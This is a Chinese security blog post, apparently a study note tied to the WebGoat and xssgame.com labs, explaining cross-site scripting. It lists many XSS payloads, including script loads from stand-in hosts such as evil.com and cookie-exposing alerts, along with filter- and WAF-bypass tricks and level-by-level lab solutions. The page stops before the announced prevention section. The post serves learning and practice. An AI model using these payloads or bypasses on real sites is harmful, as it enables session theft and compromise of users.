<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="这个笔记基础内容是基于WebGoat靶场撰写的Cross Site Scripting (XSS) https:&#x2F;&#x2F;owasp.org&#x2F;www-community&#x2F;attacks&#x2F;xss&#x2F;XSS Filter Evasion Cheat Sheet ：https:&#x2F;&#x2F;cheatsheetseries.owasp.org&#x2F;cheatsheets&#x2F;XSS_Filter_Evasion_Cheat_Sh">
<meta property="og:type" content="article">
<meta property="og:title" content="【Web安全】XSS跨站脚本攻击">
<meta property="og:url" content="https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/index.html">
<meta property="og:site_name" content="g0dam">
<meta property="og:description" content="这个笔记基础内容是基于WebGoat靶场撰写的Cross Site Scripting (XSS) https:&#x2F;&#x2F;owasp.org&#x2F;www-community&#x2F;attacks&#x2F;xss&#x2F;XSS Filter Evasion Cheat Sheet ：https:&#x2F;&#x2F;cheatsheetseries.owasp.org&#x2F;cheatsheets&#x2F;XSS_Filter_Evasion_Cheat_Sh">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/image.png">
<meta property="og:image" content="https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/image-1.png">
<meta property="og:image" content="https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/image-2.png">
<meta property="og:image" content="https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/image-3.png">
<meta property="og:image" content="https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/image-4.png">
<meta property="article:published_time" content="2024-09-20T11:10:22.000Z">
<meta property="article:modified_time" content="2024-09-23T10:10:15.583Z">
<meta property="article:author" content="g0dam">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/image.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>【Web安全】XSS跨站脚本攻击</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="g0dam" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/09/24/WebSecurity/xmlexternalentity/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/09/20/PaperReading/ZeroWall/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&text=【Web安全】XSS跨站脚本攻击"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&is_video=false&description=【Web安全】XSS跨站脚本攻击"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【Web安全】XSS跨站脚本攻击&body=Check out this article: https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&title=【Web安全】XSS跨站脚本攻击"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&name=【Web安全】XSS跨站脚本攻击&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://g0dam.github.io/2024/09/20/WebSecurity/crosssitescripting/&t=【Web安全】XSS跨站脚本攻击"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A6%82%E5%BF%B5"><span class="toc-number">1.</span> <span class="toc-text">概念</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS%E7%9A%84%E6%94%BB%E5%87%BB%E8%BD%BD%E8%8D%B7"><span class="toc-number">2.</span> <span class="toc-text">XSS的攻击载荷</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS-%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7"><span class="toc-number">3.</span> <span class="toc-text">XSS 绕过技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Eval-%E5%85%B6%E5%AE%83%E5%86%97%E4%BD%99%E7%AC%A6%E5%8F%B7"><span class="toc-number">3.1.</span> <span class="toc-text">Eval &amp; 其它冗余符号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%94%99%E8%AF%AF%E8%BE%93%E5%85%A5%E8%BF%87%E6%BB%A4%E6%9C%BA%E5%88%B6%E5%AE%9E%E7%8E%B0%E7%BB%95%E8%BF%87"><span class="toc-number">3.2.</span> <span class="toc-text">利用错误输入过滤机制实现绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98"><span class="toc-number">4.</span> <span class="toc-text">靶场实战</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%98%B2%E8%8C%83XSS"><span class="toc-number">5.</span> <span class="toc-text">防范XSS</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        【Web安全】XSS跨站脚本攻击
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">g0dam</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-20T11:10:22.000Z" class="dt-published" itemprop="datePublished">2024-09-20</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Web-Security/">Web Security</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/XSS/" rel="tag">XSS</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>这个笔记基础内容是基于WebGoat靶场撰写的<br>Cross Site Scripting (XSS) <a target="_blank" rel="noopener" href="https://owasp.org/www-community/attacks/xss/">https://owasp.org/www-community/attacks/xss/</a><br>XSS Filter Evasion Cheat Sheet ：<a target="_blank" rel="noopener" href="https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html">https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html</a><br>干货笔记！一文讲透XSS(跨站脚本)漏洞 <a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1969009">https://cloud.tencent.com/developer/article/1969009</a><br>他山之石 | 对 XSS 的一次深入分析认识 <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/195507.html">https://www.freebuf.com/articles/web/195507.html</a><br>超全的xss绕过技巧 <a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000044942572">https://segmentfault.com/a/1190000044942572</a><br>前端安全系列（一）：如何防止XSS攻击？ <a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000016551188">https://segmentfault.com/a/1190000016551188</a></p>
<p>相关论文：</p>
<ul>
<li>Dancer in the Dark: Synthesizing and Evaluating Polyglots for Blind Cross-Site Scripting</li>
<li>Link: Black-Box Detection of Cross-Site Scripting Vulnerabilities Using Reinforcement Learning</li>
<li>Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild</li>
</ul>
<h2 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h2><p>最基础的验证语句<code>&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</code>，</p>
<p>XSS最常出现的地方：</p>
<ul>
<li>Search fields that echo a search string back to the user（将搜索字符串回显给用户的搜索字段）</li>
<li>Input fields that echo user data（回显用户数据的输入字段）</li>
<li>Error messages that return user-supplied text（返回用户输入文本的错误消息）</li>
<li>Hidden fields that contain user-supplied data（包含用户数据的隐藏字段）</li>
<li>Any page that displays user-supplied data（显示用户数据的任何页面）<ul>
<li>Message boards（留言板）</li>
<li>Free form comments（自由形式评论）</li>
</ul>
</li>
<li>HTTP Headers（HTTP头部）</li>
</ul>
<p>XSS攻击可能会导致：</p>
<ul>
<li>Stealing session cookies 窃取会话cookie</li>
<li>Creating false requests 创建虚假请求</li>
<li>Creating false fields on a page to collect credentials 在页面上创建用于收集凭据的虚假字段</li>
<li>Redirecting your page to a “non-friendly” site 将您的页面重定向到“不友好”的网站</li>
<li>Creating requests that masquerade as a valid user 创建伪装成有效用户的请求</li>
<li>Stealing of confidential information 窃取机密信息</li>
<li>Execution of malicious code on an end-user system (active scripting) 在最终用户系统上执行恶意代码（主动脚本）</li>
<li>Insertion of hostile and inappropriate content 插入敌对和不适当的内容</li>
</ul>
<p>XSS攻击类型：<br>反射型（Reflected）</p>
<ul>
<li>用户请求中的恶意内容通过Web浏览器显示给用户</li>
<li>服务器响应后，恶意内容被写入页面</li>
<li>需要社交工程学技巧</li>
<li>以用户在浏览器中继承的浏览器权限运行<img src="/2024/09/20/WebSecurity/crosssitescripting/image.png" class=""></li>
</ul>
<p>DOM-based（技术上也属于反射型）</p>
<ul>
<li>客户端脚本使用用户请求中的恶意内容将HTML写入其页面</li>
<li>类似于反射型XSS</li>
<li>以用户在浏览器中继承的浏览器权限运行</li>
</ul>
<p>存储型（Stored or persistent）</p>
<ul>
<li>恶意内容存储在服务器上（数据库、文件系统或其他对象），稍后显示给用户的Web浏览器</li>
<li>不需要社交工程学技巧</li>
</ul>
<p>除此之外还有下面这些xss类别：<br>mXSS：mXSS中文是突变型XSS，指的是原先的Payload提交是无害不会产生XSS，而由于一些特殊原因，如反编码等，导致Payload发生变异，导致的XSS。 <a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/409092.html">https://www.freebuf.com/articles/network/409092.html</a><br>UXSS：是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。UXSS 可以理解为Bypass 同源策略。</p>
<h2 id="XSS的攻击载荷"><a href="#XSS的攻击载荷" class="headerlink" title="XSS的攻击载荷"></a>XSS的攻击载荷</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=http://xxx.com/xss.js&gt;&lt;/script&gt;  #引用外部的xss</span><br><span class="line">&lt;script&gt; alert(&quot;hack&quot;)&lt;/script&gt;   #弹出hack</span><br><span class="line">&lt;script&gt;alert(document.cookie)&lt;/script&gt; #弹出cookie</span><br><span class="line"></span><br><span class="line">&lt;img  src=1  onerror=alert(&quot;hack&quot;)&gt;</span><br><span class="line">&lt;img  src=1  onerror=alert(/hack/)&gt;</span><br><span class="line">&lt;img  src=1  onerror=alert(document.cookie)&gt;  #弹出cookie</span><br><span class="line">&lt;img  src=1  onerror=alert(123)&gt;      注：对于数字，可以不用引号</span><br><span class="line">&lt;img  src=&quot;javascript:alert(&quot;XSS&quot;);&quot;&gt;</span><br><span class="line">&lt;img  dynsrc=&quot;javascript:alert(&#x27;XSS&#x27;)&quot;&gt;</span><br><span class="line">&lt;img  lowsrc=&quot;javascript:alert(&#x27;XSS&#x27;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;body onload=alert(&quot;XSS&quot;)&gt;</span><br><span class="line">&lt;body background=&quot;javascript:alert(&quot;XSS&quot;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">// 由于浏览器的内容安全策略（CSP），iFrame中的JavaScript无法访问父页面的DOM</span><br><span class="line">&lt;iframe src=”http://evil.com/xss.html”&gt;</span><br><span class="line"></span><br><span class="line">// 在某些浏览器中，如果标记的type属性&lt;input&gt;设置为image，则可以对其进行操作以嵌入脚本</span><br><span class="line">&lt;input type=&quot;image&quot; src=&quot;javascript:alert(&#x27;XSS&#x27;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;link rel=&quot;stylesheet&quot; href=&quot;javascript:alert(&#x27;XSS&#x27;);&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;table background=&quot;javascript:alert(&#x27;XSS&#x27;)&quot;&gt;</span><br><span class="line">&lt;td background=&quot;javascript:alert(&#x27;XSS&#x27;)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;div style=&quot;background-image: url(javascript:alert(&#x27;XSS&#x27;))&quot;&gt;</span><br><span class="line">&lt;div style=&quot;width: expression(alert(&#x27;XSS&#x27;));&quot;&gt;</span><br><span class="line"></span><br><span class="line">// 该&lt;object&gt;标签可用于从外部站点脚本包含</span><br><span class="line">&lt;object type=&quot;text/x-scriptlet&quot; data=&quot;http://hacker.com/xss.html&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;style onload=alert(1) /&gt;</span><br><span class="line"></span><br><span class="line">// Marquee 标签除了在web开发中有标签内容回滚作用之外，它还支持一系列的事件处理程序，因此可以用它来实现XSS Payload触发。</span><br><span class="line">&lt;marquee behavior=&quot;alternate&quot; onstart=alert(1)&gt;hack the planet&lt;/marquee&gt;</span><br><span class="line">&lt;marquee loop=&quot;1&quot; onfinish=alert(1)&gt;hack the planet&lt;/marquee&gt;</span><br><span class="line">&lt;marquee onstart=alert(1)&gt;hack the planet&lt;/marquee&gt;</span><br><span class="line"></span><br><span class="line">// media标签</span><br><span class="line">&lt;audio oncanplay=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;  // 在用户可以开始播放音视频（audio/video）时触发；</span><br><span class="line">&lt;audio ondurationchange=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;  // 在音视频（audio/video）的时长发生变化时触发；</span><br><span class="line">&lt;audio autoplay=true onended=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;</span><br><span class="line">&lt;audio onloadeddata=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;</span><br><span class="line">&lt;audio onloadedmetadata=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;</span><br><span class="line">&lt;audio onloadstart=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;</span><br><span class="line">&lt;audio onprogress=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;</span><br><span class="line">&lt;audio onsuspend=alert(1) src=&quot;/media/hack-the-planet.mp3&quot; /&gt;</span><br><span class="line">&lt;video oncanplay=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br><span class="line">&lt;video ondurationchange=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br><span class="line">&lt;video autoplay=true onended=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br><span class="line">&lt;video onloadeddata=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br><span class="line">&lt;video onloadedmetadata=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br><span class="line">&lt;video onloadstart=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br><span class="line">&lt;video onprogress=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br><span class="line">&lt;video onsuspend=alert(1) src=&quot;/media/hack-the-planet.mp4&quot; /&gt;</span><br></pre></td></tr></table></figure>
<h2 id="XSS-绕过技巧"><a href="#XSS-绕过技巧" class="headerlink" title="XSS 绕过技巧"></a>XSS 绕过技巧</h2><h3 id="Eval-其它冗余符号"><a href="#Eval-其它冗余符号" class="headerlink" title="Eval &amp; 其它冗余符号"></a>Eval &amp; 其它冗余符号</h3><p>如果目标系统的WAF或其它防护软件没把 <code>/(eval|replace)\(.+?\)/i</code> 这种样式列入黑名单，那么我们可以在其中通过夹杂冗余符号的方式形成Payload，利用其中的eval动作来加载Payload，再利用之后的replace动作把冗余符号进行替换删除。<br><code>eval(&#39;~a~le~rt~~(~~1~~)~&#39;.replace(/~/g, &#39;&#39;))</code><br>当引号被转义（escape）之后，不管使用了什么绕过技术，肯定会引起问题，就像上面的<code>eval(&#39;~a~le~rt~~(~~1~~)~&#39;.replace(/~/g, &#39;&#39;))</code>一样，如果要顺带把引号转义，其Payload可能如下：<br><code>eval(\&#39;~a~le~rt~~(~~1~~)~\&#39;.replace(/~/g, \&#39;\&#39;))</code><br>但另一种变换方法就是利用正则表达式来避免带入引号的使用，如可以在上述Payload中引入正斜杠方式，然后再用创建的正则表达式对象属性来访问其中的闭合字符串。示例如下：<br><code>eval(/~a~le~rt~~(~~1~~)~/.source.replace(/~/g, new String()))</code><br>以此用new String()来实现把~转换为空字符串的目的，从而不需要用到引号。<br>对引号实行转义并绕过WAF类产品模式匹配规则的一个有效手段是使用eval的String.fromCharCode方法，该方法将获取一个或多个十进制Unicode值，然后将它们转换成等效的ASCII字符，并将它们连成一个字符串，如：<br><code>console.log(String.fromCharCode(65,66,67,68))  //在终端返回显示的是字符串 &quot;ABCD&quot;</code><br>通过这种对Unicode值的转换，可以把目标值传递给eval，因此，可以构造Payload如下：<br><code>eval(String.fromCharCode(97,108,101,114,116,40,49,41))  //// 最终执行的会是 alert(1)</code></p>
<p>我们也可以采取其它方法来规避过滤。由于函数可以存储在JavaScript的变量中，所以为了不直接调用eval，我们可以把它分配给一个变量，然后间接调用它，示例如下：<br><code>var x = eval; x(&#39;alert(1)&#39;)</code><br>另外一种间接调用eval的方法是用括号进行构造，即用括号间接调用法，如表达式(1,2,3,4)返回的是4，即括号中最后一个，所以(1,eval)返回的是函数eval，具体示例如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">(eval)    // 返回函数eval</span><br><span class="line">(1, eval) // 仍然返回函数eval</span><br></pre></td></tr></table></figure>
<p>因此可以构造以下Payload来执行：<code>(1, eval)(&#39;alert(1)&#39;)  // 返回 alert(1)</code><br>基于此，也可以使用call方法来直接调用，如下：<code>eval.call(null, &#39;alert(1)&#39;)  //返回 alert(1)</code><br>其次，可以定义一个新函数的方法来规避直接对eval的调用，当然这种方法还会涉及到一些语法定义，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function hackThePlanet () &#123;</span><br><span class="line"></span><br><span class="line">  alert(1)</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>最后，还可以用创建Function对象的方式来实现alert调用，该对象接受构造函数中的字符串作为函数实现，如下：<code>new Function(&#39;alert(1)&#39;)()</code></p>
<h3 id="利用错误输入过滤机制实现绕过"><a href="#利用错误输入过滤机制实现绕过" class="headerlink" title="利用错误输入过滤机制实现绕过"></a>利用错误输入过滤机制实现绕过</h3><p>删除机制：<br>也可能会删的不干净，如下是常见的绕过方式：<code>&lt;sc&lt;script&gt;ript&gt;alert(1)&lt;/sc&lt;/script&gt;ript&gt;</code><br>上述javascript中，如果过滤器只是简单地把<code>&lt;script&gt;</code>和 <code>&lt;/script&gt;</code> 标签对删除了，那么最终会剩下：<code>&lt;script&gt;alert(1)&lt;/script&gt;</code><br>同样的方法可以应用到一些标签属性或事件处理程序中，就像如果onerror是删除目标，那么，我们可以构造以下Payload：<code>&lt;img src=x ononerrorerror=alert(1) /&gt;</code></p>
<p>替换机制：<br>如果目标系统的过滤器会把<code>&lt;script&gt;&lt;/script&gt;</code>标签对都过滤替换为NAUGHTY_HACKER字段，那么，我们提交<code>&lt;script&gt;alert(1)&lt;/script&gt;</code> 之后的结果就会是NAUGHTY_HACKERalert(1)NAUGHTY_HACKER。<br>但如果我们把&lt;<code>script&gt;标签对的声明改为&lt;script &lt;script&gt;&gt;</code> 和 <code>&lt;/script &lt;/script&gt;&gt;</code>这种嵌套式样式后，那么参照替换为NAUGHTY_HACKER字段的规则，对于<code>&lt;script&gt;alert(1)&lt;/script&gt;</code>来说，目标过滤器会把它过滤为：<br><code>&lt;script NAUGHTY_HACKER&gt;alert(1)&lt;/script NAUGHTY_HACKER&gt;</code><br>看上去是个莫名标签，但浏览器的容错机制仍会执行上面的代码</p>
<h2 id="靶场实战"><a href="#靶场实战" class="headerlink" title="靶场实战"></a>靶场实战</h2><p><a target="_blank" rel="noopener" href="http://www.xssgame.com/">http://www.xssgame.com/</a><br>第一关直接插入就好了，来看第二关<br>测试xss的主要思路是看回显在哪里，通过自定义化输入闭合或绕过一些限制</p>
<img src="/2024/09/20/WebSecurity/crosssitescripting/image-1.png" class="">
<p>可以看到我们的输入回显在两个地方，针对第一个地方<code>onload=&quot;startTimer(&#39;1&#39;);&quot;</code>，在JS代码中，如：<code>var a = &#39;a&#39; + alert(); </code>，在运算过程中会自动执行响应函数，我们可以利用这里的onload函数<code>onload=&quot;startTimer(&#39;1&#39; + alert(1)+&#39;1&#39;);&quot; /&gt;</code>，构造这样的语句就可以实现弹窗，使用这个payload也可以实现：<code>&#39;); alert(1); //</code></p>
<p>第三关，根据提示，直接看代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">chooseTab</span>(<span class="params">name</span>) &#123;</span><br><span class="line">        <span class="keyword">var</span> html = <span class="string">&quot;Cat &quot;</span> + <span class="built_in">parseInt</span>(name) + <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        html += <span class="string">&quot;&lt;img src=&#x27;/static/img/cat&quot;</span> + name + <span class="string">&quot;.jpg&#x27; /&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;tabContent&#x27;</span>).<span class="property">innerHTML</span> = html;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Select the current tab</span></span><br><span class="line">        <span class="keyword">var</span> tabs = <span class="variable language_">document</span>.<span class="title function_">querySelectorAll</span>(<span class="string">&#x27;.tab&#x27;</span>);</span><br><span class="line">        <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; tabs.<span class="property">length</span>; i++) &#123;</span><br><span class="line">          <span class="keyword">if</span> (tabs[i].<span class="property">id</span> == <span class="string">&quot;tab&quot;</span> + <span class="built_in">parseInt</span>(name)) &#123;</span><br><span class="line">            tabs[i].<span class="property">className</span> = <span class="string">&quot;tab active&quot;</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            tabs[i].<span class="property">className</span> = <span class="string">&quot;tab&quot;</span>;</span><br><span class="line">          &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">hash</span> = name;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Tell parent we&#x27;ve changed the tab</span></span><br><span class="line">        top.<span class="title function_">postMessage</span>(&#123;<span class="string">&#x27;url&#x27;</span>: self.<span class="property">location</span>.<span class="title function_">toString</span>()&#125;, <span class="string">&quot;*&quot;</span>);</span><br><span class="line">      &#125;</span><br></pre></td></tr></table></figure>
<p>看到了有用到img标签，前面总结的载荷中就写到了，图片显示错误的话会自动触发onerror，<code>&lt;img src=x ononerrorerror=alert(1) /&gt;</code>，构造payload<code>/#1&#39; onerror=&#39;alert(11)&#39;</code>，来到下一关</p>
<p>第四关，看到没有任何回显，在几个页面间跳转，F12查看页面源代码，发现了一行这样的代码<code>setTimeout(function() &#123; window.location = &#39;welcome&#39;; &#125;, 1000);</code>，这里需要提到一个知识点：<code>window.location</code> 等同于 <code>window.location.href</code>，而href属性支持执行javascript也就是这样写：<code>href=&#39;javascript:alert()&#39;</code>，因此可以构造Payload：<code>next=javascript:alert()</code>，成功执行</p>
